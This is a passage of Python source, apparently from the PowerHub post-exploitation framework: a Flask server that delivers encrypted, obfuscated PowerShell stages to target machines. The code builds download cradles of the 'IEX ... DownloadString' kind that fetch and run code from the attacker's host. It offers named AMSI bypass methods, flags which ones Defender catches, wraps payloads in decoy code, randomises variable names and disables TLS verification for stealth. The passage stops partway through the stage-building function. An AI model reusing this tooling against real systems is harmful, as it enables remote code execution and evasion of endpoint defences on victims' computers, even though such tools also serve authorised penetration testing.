import logging

from sqlalchemy.exc import OperationalError
from sqlalchemy import text

_db = None
log = logging.getLogger(__name__)


def init_db(db):
    global _db
    _db = db
    init_settings()
    _db.create_all()
    _db.session.commit()
    try:
        upgrade_from_111_to_200(db)
    except OperationalError as e:
        msg = str(e)
        if not (
            'duplicate column name' in msg
            or 'no such table' in msg
        ):
            raise


def upgrade_from_111_to_200(db):
    """Add the `executable` column to the `Entry` table"""
    with db.engine.connect() as connection:
        connection.execute(text(
            'alter table Entry add column executable Boolean'
            ' not null default false'
        ))
        log.info("Schema upgrade successful (2.0)")


def get_setting(key):
    if not _db:
        return None
    setting = Setting.query.filter_by(key=key).first()
    if setting:
        return setting.value
    return None


def set_setting(key, value):
    if not _db:
        return None
    s = Setting(key=key, value=value)
    _db.session.add(s)
    _db.session.commit()


def init_settings():
    if not _db:
        return None
    global Setting

    class Setting(_db.Model):
        key = _db.Column(_db.String(255), primary_key=True)
        value = _db.Column(_db.String(1024), unique=False, nullable=False)


def get_clipboard():
    return get_clipboard_with_db(_db)


def get_clipboard_with_db(db):
    class Entry(db.Model):
        id = db.Column(db.Integer, primary_key=True)
        content = db.Column(db.String(8*1024), unique=False, nullable=False)
        time = db.Column(db.String(120), unique=False, nullable=False)
        IP = db.Column(db.String(39), unique=False, nullable=False)
        # 39 because could be ipv6
        executable = db.Column(db.Boolean(), nullable=False, default=False)

        def __repr__(self):
            return '<Entry %r>' % self.time

        @property
        def timedelta(self):
            return get_timedelta(self.time)

    class Clipboard(object):
        def __init__(self):
            db.create_all()
            try:
                self.entries = {e.id: e for e in Entry.query.all()}
            except OperationalError:
                self.entries = {}
            # The entries dict needs to be kept in sync after all operations

        def __iter__(self):
            return iter(self.entries)

        def add(self, content, time, IP):
            e = Entry(content=content, time=time, IP=IP, executable=False)
            db.session.add(e)
            db.session.commit()
            self.entries[e.id] = e

        def edit(self, id, content):
            e = Entry.query.filter_by(id=id).first()
            e.content = content
            db.session.commit()
            self.entries[e.id] = e

        def set_executable(self, id, value):
            e = Entry.query.filter_by(id=id).first()
            e.executable = value
            db.session.commit()
            self.entries[e.id] = e

        def delete(self, id):
            e = self.entries[id]
            e_ = db.session.merge(e)
            db.session.delete(e_)
            db.session.commit()
            del self.entries[e.id]

        def __len__(self):
            return len(self.entries.keys())

    return Clipboard()


def get_clip_entry_list(clipboard):
    return [
        (
            c.id,
            '[%d] %s' % (
                c.id, c.content[:50] + ("..." if len(c.content) > 50 else "")
            ),
        ) for c in clipboard.entries.values() if c.executable
    ]


def get_timedelta(time):
    from datetime import datetime as dt
    result = dt.utcnow() - dt.fromisoformat(time)

    if result.total_seconds() < 60:
        result = "%ss" % result.seconds
    elif result.total_seconds() < 3600:
        result = "%sm" % (result.seconds // 60)
    elif result.total_seconds() < 86400:
        result = "%sh" % (result.seconds // 3600)
    else:
        result = "%sd" % result.days

    return result



import logging
import os
import signal
import threading

from flask import Flask
from werkzeug.middleware.proxy_fix import ProxyFix
from werkzeug.serving import WSGIRequestHandler, _log
from flask_socketio import SocketIO

import powerhub.directories as ph_dir
from powerhub import __version__

log = logging.getLogger(__name__)


def start_thread(f, *args):
    threading.Thread(
        target=f,
        args=(*args,),
        daemon=True,
    ).start()


def shut_up_twisted():
    # I give up. I tried a thousand ways to shut up these damn exceptions in
    # twisted, nothing works. This will monkey patch the module to suppress
    # these #@$!%? stubborn, useless messages.

    def dummy(**kwargs):
        return

    try:
        from twisted.python import log
        log.err = dummy
    except (AttributeError, ImportError):
        pass


class MyRequestHandler(WSGIRequestHandler):
    def address_string(self):
        if 'x-forwarded-for' in dict(self.headers._headers):
            return dict(self.headers._headers)['x-forwarded-for']
        else:
            return self.client_address[0]

    def log(self, type, message, *largs):
        # don't log datetime again
        if " /socket.io/?" not in largs[0]:
            _log(type, '%s %s\n' % (self.address_string(), message % largs))


class PowerHubApp(object):
    """This is the main app class

    It holds all parameters, settings and "sub apps", such as the flask app,
    the reverse proxy, the database, etc.

    """
    def __init__(self, args):
        """
        You can pass arguments to PowerHub by putting them in argv. If
        empty, sys.argv will be used (i.e. the command line arguments).

        """

        shut_up_twisted()

        self.args = args
        ph_dir.init_directories(workspace_dir=args.WORKSPACE_DIR,
                                create_missing=True)
        self.init_flask()
        self.init_db()
        self.init_clipboard()
        self.init_socketio()
        self.init_settings()

        from powerhub.modules import set_up_watchdog, update_modules
        update_modules()
        set_up_watchdog()

        self.set_flask_app_attributes()

        if not (self.args.AUTH or self.args.NOAUTH):
            from powerhub.tools import generate_random_key
            log.info("You specified neither '--no-auth' nor '--auth <user>:<pass>'. "
                     "A password will be generated for your protection.")
            self.args.AUTH = "powerhub:" + generate_random_key(10)
            log.info("The credentials for basic authentication are '%s' "
                     "(without quotes)." % self.args.AUTH)

        # Call symbol_name so some variables have a constant obfuscate name
        # across sessions (but not across instances).
        # This enables the user to use to same download cradle after
        # restarts of PowerHub.
        from powerhub.stager import symbol_name
        for var in "global_key store_dl web_client".split():
            symbol_name(var, natural=False, seed=self.key)
            symbol_name(var, natural=True, seed=self.key)

    def init_socketio(self):
        self.socketio = SocketIO(
            self.flask_app,
            async_mode="threading",
            cors_allowed_origins=[
                "http://%s:%d" % (
                    self.args.URI_HOST,
                    self.args.LPORT,
                ),
                "https://%s:%d" % (
                    self.args.URI_HOST,
                    self.args.SSL_PORT,
                ),
            ],
        )

    def init_flask(self):
        from powerhub.flask import app as flask_blueprint

        self.flask_app = Flask(__name__, static_url_path='/invalid')
        self.flask_app.register_blueprint(flask_blueprint)
        self.flask_app.wsgi_app = ProxyFix(
            self.flask_app.wsgi_app,
            x_proto=1,
            x_host=1,
            x_port=1
        )

        self.flask_app.config.update(
            DEBUG=self.args.DEBUG,
            SECRET_KEY=os.urandom(16),
            SQLALCHEMY_DATABASE_URI='sqlite:///' + ph_dir.directories.DB_FILENAME,
            SQLALCHEMY_TRACK_MODIFICATIONS=False,
        )

        self.flask_app.jinja_env.globals['AUTH'] = self.args.AUTH
        self.flask_app.jinja_env.globals['VERSION'] = __version__

    def set_flask_app_attributes(self):
        """Set some global vars for the flask apps"""
        from powerhub.hiddenapp import hidden_app
        from powerhub.flask import app as flask_app
        hidden_app.jinja_env.globals['VERSION'] = __version__
        for app in [flask_app, hidden_app]:
            for k, v in {
                'key': self.key,
                'clipboard': self.clipboard,
                'args': self.args,
                'callback_urls': self.callback_urls(),
                'webdav_url': self.webdav_url(),
                'socketio': self.socketio,
            }.items():
                setattr(app, k, v)

    def init_db(self):
        from flask_sqlalchemy import SQLAlchemy
        from powerhub.sql import init_db
        db = SQLAlchemy(self.flask_app)
        with self.flask_app.app_context():
            init_db(db)
        self.db = db

    def init_clipboard(self):
        from powerhub.sql import get_clipboard
        with self.flask_app.app_context():
            self.clipboard = get_clipboard()

    def init_settings(self):
        from powerhub.tools import get_secret_key
        with self.flask_app.app_context():
            self.key = get_secret_key()

    def callback_urls(self):
        return {
            'http': 'http://%s:%d/%s' % (
                self.args.URI_HOST,
                self.args.URI_PORT if self.args.URI_PORT else self.args.LPORT,
                self.args.URI_PATH+'/' if self.args.URI_PATH else '',
            ),
            'https': 'https://%s:%d/%s' % (
                self.args.URI_HOST,
                self.args.URI_PORT if self.args.URI_PORT else self.args.SSL_PORT,
                self.args.URI_PATH+'/' if self.args.URI_PATH else '',
            ),
        }

    def webdav_url(self):
        # TODO consider https
        return 'http://%s:%d/webdav' % (
            self.args.URI_HOST,
            self.args.LPORT,
        )

    def run_flask_app(self):
        self.socketio.run(
            self.flask_app,
            port=self.args.FLASK_PORT,
            host='127.0.0.1',
            use_reloader=False,
            request_handler=MyRequestHandler,
            allow_unsafe_werkzeug=True,
        )

    def signal_handler(self, sig, frame):
        log.info("CTRL-C caught, exiting...")
        self.stop()

    def run(self, background=False):
        from powerhub.reverseproxy import run_proxy
        signal.signal(signal.SIGINT, self.signal_handler)

        from powerhub.webdav import run_webdav

        def _run_webdav():
            if self.args.WEBDAV_AUTH:
                if ':' in self.args.WEBDAV_AUTH:
                    USER, PASS = self.args.WEBDAV_AUTH.split(':')[:2]
                else:
                    USER, PASS = self.args.WEBDAV_AUTH, ''
            else:
                from powerhub.tools import generate_random_key
                USER = 'powerhub'
                PASS = generate_random_key(8)
                self.args.WEBDAV_AUTH = '%s:%s' % (USER, PASS)
                log.warning("No WebDAV credentials given, using: %s:%s" % (USER, PASS))

            run_webdav(self.args.WEBDAV_PORT, USER, PASS)

        start_thread(_run_webdav)
        start_thread(self.run_flask_app)

        if background:
            start_thread(lambda: run_proxy(self.args))
        else:
            run_proxy(self.args)

    def stop(self):
        from powerhub import reverseproxy
        if not reverseproxy.reactor._stopped:
            reverseproxy.reactor.stop()



from base64 import b64encode
import logging
import os
import random
import string

from flask import render_template, request, Response, Flask

from powerhub.tools import encrypt_rc4, encrypt_aes, compress
import powerhub.modules as phmod
from powerhub.stager import get_stage, insert_decoys
from powerhub.directories import directories
from powerhub.dhkex import DH_G, DH_MODULUS, DH_ENDPOINT
from powerhub.parameters import param_collection
from powerhub import __version__

hidden_app = Flask(
    'hidden_app',
    template_folder=os.path.join(directories.BASE_DIR, 'templates'),
)
hidden_app.config['TEMPLATES_AUTO_RELOAD'] = True

log = logging.getLogger(__name__)


@hidden_app.add_template_filter
def debug(msg):
    """This is a function for debugging statements in jinja2 templates"""
    if log.getEffectiveLevel() == logging.DEBUG:
        return msg
    return ""


@hidden_app.add_template_filter
def rc4encrypt(msg):
    """This is a function for encrypting strings in jinja2 templates"""
    return b64encode(encrypt_rc4(msg.encode(), hidden_app.key)).decode()


def get_stage3():
    minimal = param_collection['minimal']
    transport = param_collection['transport']
    slow_encryption = param_collection['slowenc']
    preloaded_modules = param_collection['preloaded']
    preloaded_modules_content = get_preloaded_modules_content(preloaded_modules)
    preloaded_modules = get_preloaded_modules(preloaded_modules)

    if hidden_app.args.WEBDAV_AUTH:
        webdav_user, webdav_pass = hidden_app.args.WEBDAV_AUTH.split(':')
    else:
        webdav_user, webdav_pass = '', ''

    powerhub_context = dict(
        modules=phmod.modules,
        preloaded_modules=preloaded_modules,
        preloaded_modules_content=preloaded_modules_content,
        callback_url=hidden_app.callback_urls[transport],
        transport=transport,
        webdav_url=hidden_app.webdav_url,
        webdav_user=webdav_user,
        webdav_pass=webdav_pass,
        key=hidden_app.key,
        VERSION=__version__,
        minimal=minimal,
        slow_encryption=slow_encryption,
    )

    stage3 = render_template(
        "powershell/powerhub.ps1",
        **powerhub_context,
    )

    return stage3


def get_profile():
    try:
        with open(os.path.join(directories.XDG_DATA_HOME, "profile.ps1"), "r") as f:
            profile = f.read()
    except FileNotFoundError:
        profile = ""
    except Exception as e:
        log.error("Error while reading profile.ps1: %s" % str(e))
        profile = ""

    return profile


def get_clipboard_entry():
    try:
        clipboard_id = int(param_collection['clip-exec'])
        if clipboard_id < 0:
            return ""

        clipboard_entry = hidden_app.clipboard.entries[clipboard_id]
        if clipboard_entry.executable:
            clipboard_entry = clipboard_entry.content
        else:
            log.error(
                "Cannot include clipboard entry %d, "
                "because the executable flag is not set"
            )
            clipboard_entry = ""
    except (TypeError, IndexError):
        clipboard_entry = ""

    return clipboard_entry


@hidden_app.route('/')
def stager():
    """Load the stager"""
    log.debug("Building stage 1; arguments: %s" % dict(request.args))

    stage3 = get_stage3()
    profile = get_profile()
    clipboard_entry = get_clipboard_entry()

    param_collection.parse_get_args_short(request.args)
    amsi_bypass = param_collection['amsi']
    amsi_bypass = os.path.join('powershell', 'amsi', amsi_bypass + '.ps1')

    key = hidden_app.key

    kex = param_collection['kex']
    natural = param_collection['natural']
    transport = param_collection['transport']
    slow_encryption = param_collection['slowenc']
    decoy = param_collection['decoy']
    obfuscate_setalias = param_collection['obfuscate_setalias']
    increment = request.args.get('increment')

    if increment or decoy:
        separator = '<#%s#>' % ''.join(random.choices(string.ascii_letters, k=32))
    else:
        separator = ''

    stager_context = dict(
        VERSION=__version__,
        key=key,
        amsibypass=amsi_bypass,
        callback=hidden_app.callback_urls[transport],
        kex=kex,
        DH_G=DH_G,
        DH_MODULUS=DH_MODULUS,
        dh_endpoint=DH_ENDPOINT,
        separator=separator,
        slow_encryption=slow_encryption,
        obfuscate_setalias=obfuscate_setalias,
    )

    result = get_stage(
        key,
        stage3_strings=[stage3, profile, clipboard_entry],
        context=stager_context,
        debug=(log.getEffectiveLevel() <= logging.DEBUG),
        natural=natural,
        remove_whitespace=(not decoy),
    )

    if decoy:
        result = insert_decoys(result, separator)

    if increment:
        result = result.split(separator)[int(increment)]
    else:
        result = result.replace(separator, '')

    # Ensure result is non-empty, cause `""|iex` throws an error
    if not result:
        log.error("Stage1 or parts thereof failed to load")
        result = " "

    log.debug("Delivering stage 1; context: %s" %
              stager_context.update(stage2='...', stage3='...'))

    return Response(result, content_type='text/plain; charset=utf-8')


@hidden_app.route('/list')
def hub_modules():
    """Return list of hub modules"""

    context = {
        "modules": phmod.modules,
    }

    result = render_template(
        "powershell/modules.csv",
        **context,
    )

    if 's' in request.args:
        # Slow encryption
        encrypt = encrypt_rc4
    else:
        encrypt = encrypt_aes

    result = encrypt(result, hidden_app.key)

    return Response(result, content_type='text/plain; charset=utf-8')


@hidden_app.route('/module')
def load_module():
    """Load a single module"""

    if 'm' not in request.args:
        return Response('error')

    try:
        n = int(request.args.get('m'))
        code = phmod.modules[n].code
    except (IndexError, ValueError):
        return Response("not found")

    if 's' in request.args:
        # Slow encryption
        encrypt = encrypt_rc4
    else:
        encrypt = encrypt_aes

    if 'c' in request.args:
        code = compress(code)

    encrypted = encrypt(code, hidden_app.key)
    resp = b64encode(encrypted)

    return Response(
        resp,
        content_type='text/plain; charset=utf-8'
    )


def get_preloaded_modules(csvlist):
    """Return a string that will be inserted into a PowerShell array

    The format of each line is this:
        New-Object PSObject -Property @{ Name="<NAME">, ... }
    """

    if not csvlist:
        return ""

    try:
        csvlist = expand_csv(csvlist)
    except Exception:
        log.error("Couldn't parse CSV list: %s" % csvlist)
        return ""

    result = "\n"

    for i in csvlist:
        try:
            m = phmod.modules[i]
        except IndexError:
            log.error("Module not found: %s" % i)
            continue

        obj = '@{ Name="%s"; Type="%s"; N=%d; Loaded=$True; Alias="" }' % (
            m.name, m.type, m.n,
        )
        result += 'New-Object PowerHubModule -Property %s \n' % obj

    return result


def get_preloaded_modules_content(csvlist):
    """Return a string that will be inserted into a PowerShell hashtable

    The format of each line is this:
        <module name> = @"<powershell string>"@
    or for binary modules:
        <module name> = [System.Convert]::FromBase64String("<b64 string>")
    """

    if not csvlist:
        return ""

    try:
        csvlist = expand_csv(csvlist)
    except Exception:
        log.error("Couldn't parse CSV list: %s" % csvlist)
        return ""

    result = "\n"

    for i in csvlist:
        try:
            m = phmod.modules[i]
        except IndexError:
            log.error("Module not found: %s" % i)
            continue
        name = m.name
        code = m.code

        if isinstance(m.code, bytes):
            code = b64encode(code).decode()
            code = '[System.Convert]::FromBase64String("%s")' % code
        else:
            code = '@"%s"@)' % code

        result += "'%s' = %s\n" % (name, code)

    return result


def expand_csv(csvlist):
    """Turn compactified CSV list into string of ints

    Example: 1,2,5-8,12,14-16
    """

    csvlist = csvlist.split(',')
    result = []
    for item in csvlist:
        if '-' in item:
            a, b = item.split('-')
            result.extend(range(int(a), int(b)+1))
        else:
            result.append(int(item))
    return result



"""Define the parameters for the download cradle and the main PowerShell
module

From the parameter collection, an HTML form will be generated in the Hub tab
of the webapp.

Some parameters are also relevant to power-obfuscate.
"""

import urllib


class Parameter(object):
    """A Parameter object that servers as GET argument in either the cradle
    builder or the stager request, or as a CLI parameter

    `value` can never be `None`, because then `default_value` is returned,
    which must not be `None`.
    Type of `value` is always bool (if it's a checkbox) or string.
    """

    def __init__(self, label, default_value, description, _type, options=[],
                 classes="relevant-to-http relevant-to-https", get_arg=None,
                 cli_arg=None, help=""):
        if options:
            assert default_value in [str(o[0]) for o in options],\
                    "%s not in list: %s" % (default_value, options)
        assert _type in 'selection checkbox radio text'.split()
        assert default_value is not None
        if _type == 'checkbox':
            assert default_value in [True, False]
        else:
            assert isinstance(default_value, str)

        self.label = label
        self.default_value = default_value
        self.description = description
        self._type = _type
        self.options = options

        # Classes can be used so the JavaScript code knows when to display
        # which elements
        self.classes = classes

        # This GET argument will be used for this parameter when loading the
        # stager via HTTP(S)
        self.get_arg = get_arg

        # If the stager is created via CLI, this can be passed to argparse
        self.cli_arg = cli_arg

        self.help = help

        self._value = None

    @property
    def value(self):
        if self._value is None:
            return self.default_value
        return self._value

    @value.setter
    def value(self, _value):
        __value = _value
        if isinstance(_value, tuple):
            __value = _value[0]
        if self.options and __value not in [str(o[0]) for o in self.options]:
            raise ValueError("%s not in list: %s" % (__value, self.options))
        if self._type == "checkbox":
            if isinstance(_value, str):
                self._value = (_value.lower().startswith('t'))
            else:
                self._value = bool(_value)
        else:
            self._value = _value

    def as_query_fragment(self):
        if self.value == self.default_value:
            return ''
        result = urllib.parse.urlencode([(self.get_arg, self.value)])
        result = '&' + result
        return result

    def __repr__(self):
        return '<Parameter: %s=%s>' % (self.label, self.value)


class ParameterCollection(object):
    def __init__(self, parameters):
        self.parameters = parameters

        # assert get_args are unique
        get_args = [p.get_arg.lower() for p in parameters if p.get_arg]
        assert len(set(get_args)) == len(get_args),\
            "Duplicate get_arg detected"

    def __repr__(self):
        return str(self.parameters)

    def update_options(self, label, options):
        p = self.get_by_label(label)
        p.options = options

    def get_by_label(self, label):
        for p in self.parameters:
            if p.label == label:
                return p

    def __getitem__(self, label):
        p = self.get_by_label(label)
        if p:
            return self.get_by_label(label).value
        else:
            raise KeyError("Unknown parameter: %s" % label)

    def get_by_get_arg(self, arg):
        for p in self.parameters:
            if p.get_arg == arg:
                return p

    def parse_get_args(self, get_args):
        """Parse dictionary of GET arguments where the keys correspond to
        each parameter's `label`"""
        for p in self.parameters:
            p.value = get_args.get(p.label, p.default_value)

    def parse_get_args_short(self, get_args):
        """Parse dictionary of GET arguments where the keys correspond to
        each parameter's `get_arg`"""
        for p in self.parameters:
            p.value = get_args.get(p.get_arg, p.default_value)


params = [
    Parameter(
        'launcher', 'powershell', "Launcher", 'selection',
        options=[
            ("powershell", "PowerShell"),
            ("cmd", "CMD"),
            ("cmd_enc", "CMD Encoded"),
            ("bash", "Bash"),
            ("mingw32", "Mingw32 Executable"),
            ("dotnetexe", ".NET Executable"),
            ("vbs", "VBScript"),
            #  ("wordmacro" , "MS Word Macro"),
            #  ("rundll32" , "Rundll32"),
            #  ("installutil" , "InstallUtil"),
        ],
        get_arg='launcher',
    ),
    Parameter(
        'amsi', 'reflection', 'AMSI Bypass', 'selection',
        options=[
            ("reflection", "Matt Graber's Reflection method"),
            ("reflection2", "Matt Graber's 2nd Reflection method (caught by latest Defender)"),
            ("rasta-mouse", "Rasta Mouse"),
            ("am0nsec", "am0nsec (Requires PowerShell Version 5)"),
            ("adam-chester",
             "Adam Chester (Requires PowerShell Version 5; caught by latest Defender)"),
            ("zc00l", "zc00l (caught by latest Defender)"),
            ("none", "None"),
        ],
        get_arg='a',
    ),
    Parameter(
        'transport', 'https', 'Transport', 'selection',
        options=[('https', 'HTTPS'), ('http', 'HTTP')],
        get_arg='t',
    ),
    Parameter(
        'kex', 'oob', 'Key Exchange', 'selection',
        options=[
            ("oob", "Out of Band"),
            ("dh", "Diffie-Hellman (requires PowerShell Version 5)"),
            ("embedded", "Embedded"),
        ],
        get_arg='k',
    ),
    Parameter('clip-exec', '-1', 'Clip-Exec', 'selection', get_arg='c'),
    Parameter(
        'preloaded', '', 'Preload', 'text', get_arg='p',
        help="Enter a compactified CSV list (e.g. '1,2,4-8,12') of modules "
             "that should come preloaded and press return. "
             "Only makes sense with key exchange 'embedded'."
    ),
    Parameter(
        'minimal', False, 'Minimal Mode', 'checkbox', get_arg='m',
        help=(
            "In minimal mode, comment-based help of Cmdlets and some obviously "
            "malicious functions are removed. Run-Exe and Run-Shellcode "
            "won't be available."),
    ),
    Parameter(
        'natural', False, 'Natural Variables', 'checkbox', get_arg='n',
        help="Use natural sounding variable names instead of randomly generated ones.",
    ),
    Parameter(
        'incremental', False, 'Incremental Delivery', 'checkbox',
        help="Deliver first stage in several requests.",
    ),
    Parameter(
        'split_cradle', False, 'Split Cradle', 'checkbox',
        help="Separate 'Invoke-Expression' from 'DownloadString' to cause less suspicion. "
             "Requires interactive execution.",),
    Parameter(
        'decoy', False, 'Include Decoys', 'checkbox', get_arg='d',
        help="Wrap suspicious code in real code from legitimate sources. "
             "Requires PowerShell Version 5.",
    ),
    Parameter(
        'obfuscate_setalias', False, "Obfuscate 'Set-Alias'", 'checkbox', get_arg='o',
        help="Wrap suspicious code in real code from legitimate sources.",
    ),
    Parameter(
        'slowenc', False, 'Slow Encryption', 'checkbox', get_arg='s',
        help="Avoid API calls to fast encryption routines for more stealth.",
    ),
    Parameter(
        'useragent', False, 'Set User-Agent', 'checkbox',
        help="By default, PowerShell sets no or a revealing user-agent. "
             "This option sets a more natural user-agent.",
    ),
    Parameter('proxy', False, 'Use Web Proxy', 'checkbox'),
    Parameter('tlsv1.2', False, 'Force TLSv1.2', 'checkbox',
              classes='relevant-to-https'),
    Parameter(
        'verification', 'noverification', 'Verification', 'radio',
        options=[
            ('noverification', 'No TLS verification'),
            ('fingerprint', 'Verify by fingerprint'),
            ('certstore', 'Use local certificate store'),
        ],
        classes='relevant-to-https',
    ),
    Parameter(
        'arch', '64bit', 'Architecture', 'radio',
        options=[('64bit', '64 Bit'), ('32bit', '32 Bit')],
        classes='relevant-to-dotnetexe relevant-to-mingw32',
    ),
]

param_collection = ParameterCollection(params)



import collections
import os


DirList = collections.namedtuple(
    'DirList',
    [
        'BASE_DIR',
        'CERT_DIR',
        'MOD_DIR',
        'STATIC_DIR',
        'UPLOAD_DIR',
        'WEBDAV_BLACKHOLE',
        'WEBDAV_DIR',
        'WEBDAV_PRIVATE',
        'WEBDAV_PUBLIC',
        'WEBDAV_RO',
        'XDG_DATA_HOME',
        'DB_FILENAME',
    ],
)
directories = None


def ensure_dir_exists(dirname):
    """Creates a directory if it doesn't exist already

    """
    if not os.path.exists(dirname):
        os.makedirs(dirname)


def init_directories(workspace_dir, create_missing=False):

    _HOME = os.path.expanduser('~')
    BASE_DIR = os.path.dirname(os.path.abspath(__file__))
    XDG_DATA_HOME = os.path.join(
        os.environ.get('XDG_DATA_HOME') or os.path.join(_HOME, '.local', 'share'),
        'powerhub',
    )

    WORKSPACE_DIR = workspace_dir or os.path.join(XDG_DATA_HOME, 'workspace')
    WORKSPACE_DIR = os.path.abspath(WORKSPACE_DIR)

    UPLOAD_DIR = os.path.join(WORKSPACE_DIR, "upload")
    STATIC_DIR = os.path.join(XDG_DATA_HOME, 'static')
    WEBDAV_DIR = os.path.join(WORKSPACE_DIR, 'webdav')
    WEBDAV_RO = os.path.join(WORKSPACE_DIR, 'webdav_ro')
    WEBDAV_BLACKHOLE = os.path.join(WEBDAV_DIR, 'blackhole')
    WEBDAV_PUBLIC = os.path.join(WEBDAV_DIR, 'public')
    WEBDAV_PRIVATE = os.path.join(WORKSPACE_DIR, 'webdav_private')

    MOD_DIR = os.path.join(XDG_DATA_HOME, 'modules')
    CERT_DIR = os.path.join(XDG_DATA_HOME, 'ssl')

    _directories = [
        BASE_DIR,
        CERT_DIR,
        MOD_DIR,
        STATIC_DIR,
        UPLOAD_DIR,
        WEBDAV_BLACKHOLE,
        WEBDAV_DIR,
        WEBDAV_PRIVATE,
        WEBDAV_PUBLIC,
        WEBDAV_RO,
        XDG_DATA_HOME,
        # order is important here, must be same as above
    ]

    if create_missing:
        for d in _directories:
            ensure_dir_exists(d)

    DB_FILENAME = os.path.join(WORKSPACE_DIR, "powerhub_db.sqlite")
    DB_FILENAME = os.path.abspath(DB_FILENAME)
    _directories.append(DB_FILENAME)

    global directories
    directories = DirList(*_directories)



import base64
import binascii
import logging
import os
import random
import re
import string

from powerhub.tools import encrypt_rc4, encrypt_aes, generate_random_key, Memoize
from powerhub.modules import sanitize_ps1
from powerhub.directories import directories


log = logging.getLogger(__name__)

symbol_list = {None: None}
VARLIST = []


@Memoize
def get_stager_increments():
    """Return number of sections in stage 1"""

    filename = os.path.join(
        directories.BASE_DIR,
        'templates',
        'powershell',
        'stage1.ps1',
    )

    with open(filename, 'r') as fp:
        content = fp.read()

    # last increment is always empty, because of the way the separators
    # are defined
    result = len(content.split('{{separator}}')) - 1
    return result


def build_cradle_https(params):
    result = ''

    if params['transport'] == 'https':
        if params['verification'] == 'noverification':
            result += ("[System.Net.ServicePointManager]::ServerCertificate"
                       "ValidationCallback={$true};")
        elif params['verification'] == 'fingerprint':
            from powerhub.reverseproxy import FINGERPRINT
            result += ("[System.Net.ServicePointManager]::ServerCertificate"
                       "ValidationCallback={param($1,$2);"
                       "$2.Thumbprint -eq '%s'};" %
                       FINGERPRINT.replace(':', ''))
        elif params['verification'] == 'certstore':
            pass
        if params['tlsv1.2']:
            result += ("[Net.ServicePointManager]::SecurityProtocol="
                       "[Net.SecurityProtocolType]::Tls12;")

    return result


def build_cradle_webclient(params, key, callback_urls, incremental=False):
    web_client = symbol_name('web_client', natural=params['natural'])

    result = "$%(web_client)s=New-Object Net.WebClient;"

    if params['proxy']:
        result += ("$%(web_client)s.Proxy=[Net.WebRequest]::GetSystemWebProxy();"
                   "$%(web_client)s.Proxy.Credentials=[Net.CredentialCache]::"
                   "DefaultCredentials;")

    if params['useragent']:
        result += (
            "$%(web_client)s.Headers['User-Agent']="
            "'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)';"
        )

    url = callback_urls[params['transport']]

    query = '?'
    for p in params.parameters:
        if p.get_arg:
            query += p.as_query_fragment()
    query = query.replace('?&', '?')

    if query.endswith('?'):
        query = query[:-1]

    # If the query is empty (i.e. all parameters are set to their default
    # values), then it's not necessary to encrypt it. However, if
    # incremental delivery is selected, this would break the syntax, so we
    # need a non-empty encrypted query. Otherwise, paths like '//1, '//2',
    # etc would be requested which would lead to the non-hidden flask app,
    # resulting in 404
    if query or incremental:
        # encrypt url
        query = encrypt_aes(query, key)
        # Make b64 encoding urlsafe
        query = query.replace('/', '_').replace('+', '-')

    downloader = "IEX $%(web_client)s.DownloadString('%(url)s%(query)s'%(extra)s)"

    if incremental:
        result += "(0..%(increments)s)|%%%%{" + downloader + "}"
        # quadruple `%`, because we need to format that string a
        # second time later
        query += '/'
        extra = '+$_'
        increments = get_stager_increments() - 1  # -1 cause we start at 0
    else:
        result += downloader
        extra = ''
        increments = 0

    result = result % dict(
        url=url,
        query=query,
        extra=extra,
        web_client=web_client,
        increments=increments,
    )

    return result


def build_cradle(params, key, callback_urls):
    """Build the download cradle given a dict of GET arguments"""
    log.debug("Building cradle with these parameters: %s" % params)

    result = ""
    natural = params['natural']
    key_var = symbol_name('global_key', natural=natural)

    result += build_cradle_https(params)

    if params['kex'] == 'oob' and key:
        result += "$%(key_var)s='%(key)s';"

    if params['transport'].startswith('http'):
        result += build_cradle_webclient(
            params, key, callback_urls, incremental=params['incremental']
        )

    result = result % dict(
        url=callback_urls[params['transport']],
        transport=params['transport'],
        amsi=params['amsi'],
        key_var=key_var,
        key=key,
    )

    if params['split_cradle']:
        store_dl = symbol_name('store_dl', natural=params['natural'])
        result = result.replace("IEX ", "")
        # Replace last semicolon
        result = result.split(';')
        result[-1] = ('$%s=' % store_dl) + result[-1]
        result = ';'.join(result)
        result = "# First execute this<br/>" + result
        result += "<br/><br/># Then this<br/>" + ("$%s|IEX" % store_dl)

    # make sure to only use single quotes
    assert '"' not in result

    powershell_exe = 'powershell.exe'

    if params['launcher'] == 'cmd':
        result = '%s "%s"' % (powershell_exe, result)
    elif params['launcher'] == 'cmd_enc':
        result = '%s -Enc %s' % (
            powershell_exe,
            binascii.b2a_base64(result.encode('utf-16le')).decode())
    elif params['launcher'] == 'bash':
        result = result.replace('$', '\\$')
        result = '"%s \\\"%s\\\""' % (powershell_exe, result)

    return result


def symbol_name(name, natural=False, seed=None, debug=False):
    """Choose an obfuscated symbol name for a given name. Uniqueness
    guaranteed.

    The random seed can be specified so that chosen variables can stay
    constant across sessions; in particular those appearing in the download
    cradle.

    If natural=True, choose a name that is typically used in scripts.

    If debug=True, the new symbol name is equal to the old symbol name.
    """

    # this is done so the symbol_name will be refreshed when getting the
    # natural symbol_name of an already used (non-natural) variable.
    if natural:
        name = name + '_natural'

    if seed:
        temp_random = random.Random(seed + name)
    else:
        temp_random = random

    if name not in symbol_list:
        if debug:
            # In debug mode, don't obfuscate
            symbol_list[name] = name
        else:
            if natural:
                symbol_list[name] = choose_natural_name(temp_random)
            else:
                symbol_list[name] = choose_random_name(temp_random)

    return symbol_list[name]


def choose_natural_name(random):
    if not VARLIST:
        with open(os.path.join(directories.BASE_DIR, 'variables.txt'), 'r') as fp:
            for line in fp:
                if not line.startswith('#'):
                    VARLIST.append(line.strip())

    result = None
    while not result or result in list(symbol_list.values()):
        result = random.choice(VARLIST)

    return result


def choose_random_name(random):
    result = None
    length = random.choice(range(4, 8))
    while not result or result in list(symbol_list.values()):
        result = ''.join([random.choice(string.ascii_lowercase)
                          for i in range(length)])
        result = random.choice(string.ascii_uppercase) + result
    return result


def debug_filter(msg, dbg=False):
    """This is a function for debugging statements in jinja2 templates"""
    if dbg:
        return msg + ";"
    return ""


def load_and_encrypt_template(env, key, filename, context):
    template = env.get_template(os.path.join('powershell', filename))
    result = template.render(**context)
    result = encrypt_rc4(result.encode(), key)
    result = base64.b64encode(result).decode()
    return result


def get_stage(key, context={}, stage3_files=[], stage3_strings=[],
              debug=False, natural=False, remove_whitespace=True):
    from jinja2 import Environment, FileSystemLoader

    env = Environment(loader=FileSystemLoader(
        os.path.join(directories.BASE_DIR, 'templates')
    ))

    def rc4encrypt(msg):
